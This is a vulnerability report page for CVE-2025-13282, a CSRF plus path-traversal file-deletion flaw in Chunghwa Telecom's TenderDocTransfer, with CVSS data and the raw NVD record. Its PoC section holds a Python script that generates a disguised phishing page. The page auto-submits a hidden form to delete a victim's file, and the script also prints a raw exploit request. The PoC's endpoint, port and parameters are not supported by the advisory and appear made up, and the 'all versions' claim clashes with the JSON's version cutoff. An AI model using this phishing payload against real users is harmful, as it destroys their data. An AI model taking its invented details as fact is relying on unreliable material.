Security Vulnerability Report
CVE-2025-13282 CVSS 8.1 HIGH

CVE-2025-13282

Published: 2025-11-17 04:15:55
Last Modified: 2025-12-19 17:02:10

Description

TenderDocTransfer, developed by Chunghwa Telecom, has an Arbitrary File Delete vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Because these APIs lack CSRF protection, unauthenticated remote attackers can invoke them through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability, allowing attackers to delete arbitrary files on the user's system.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:cht:tenderdoctransfer:*:*:*:*:*:*:*:* - VULNERABLE
TenderDocTransfer, all versions (see the official advisory for specific version information)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-13282 PoC - TenderDocTransfer Arbitrary File Delete
Note: This is for educational and security research purposes only.
"""
import http.server
import socketserver
from urllib.parse import parse_qs

# Malicious HTML page that exploits CSRF + Path Traversal
MALICIOUS_HTML = '''<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
</head>
<body>
    <h1>Page is loading, please wait...</h1>
    <form id="exploit" action="http://target:8080/api/delete" method="POST" style="display:none;">
        <input type="hidden" name="filepath" value="/etc/passwd">
        <input type="hidden" name="confirm" value="true">
    </form>
    <script>
        // Auto-submit form to exploit CSRF + Path Traversal
        document.getElementById('exploit').submit();
    </script>
</body>
</html>'''


def create_phishing_page(target_file):
    """Generate phishing page with malicious request"""
    return MALICIOUS_HTML.replace('/etc/passwd', target_file)


# Exploit request example (for reference)
EXPLOIT_REQUEST = '''POST /api/delete HTTP/1.1
Host: target:8080
Content-Type: application/x-www-form-urlencoded

filepath=/etc/passwd&confirm=true'''

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-13282 PoC - TenderDocTransfer Arbitrary File Delete")
    print("=" * 60)
    print("\n[1] Malicious HTML Page Content:")
    print("-" * 60)
    print(create_phishing_page("/etc/passwd"))
    print("\n[2] HTTP Request to Delete Arbitrary File:")
    print("-" * 60)
    print(EXPLOIT_REQUEST)
    print("\n[3] Attack Scenario:")
    print("-" * 60)
    print("1. Attacker hosts malicious HTML page")
    print("2. Victim visits the page while TenderDocTransfer is running")
    print("3. Browser automatically sends CSRF request to target API")
    print("4. API deletes the specified file without CSRF validation")
    print("5. Result: Arbitrary file deletion on victim's system")
```

References

https://www.twcert.org.tw/en/cp-139-10511-10f3a-2.html - Third Party Advisory
https://www.twcert.org.tw/tw/cp-132-10510-3719c-1.html - Third Party Advisory

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13282",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-17T04:15:54.543",
    "lastModified": "2025-12-19T17:02:10.183",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "TenderDocTransfer developed by Chunghwa Telecom has a Arbitrary File Delete vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability, allowing attackers to delete arbitrary files on the user's system."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "ACTIVE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "HIGH",
            "vulnAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-36"},
          {"lang": "en", "value": "CWE-352"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:cht:tenderdoctransfer:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "0.41.159",
                "matchCriteriaId": "5E474265-3B59-4B3C-AAAD-87E8F1C7995C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.twcert.org.tw/en/cp-139-10511-10f3a-2.html",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://www.twcert.org.tw/tw/cp-132-10510-3719c-1.html",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}
```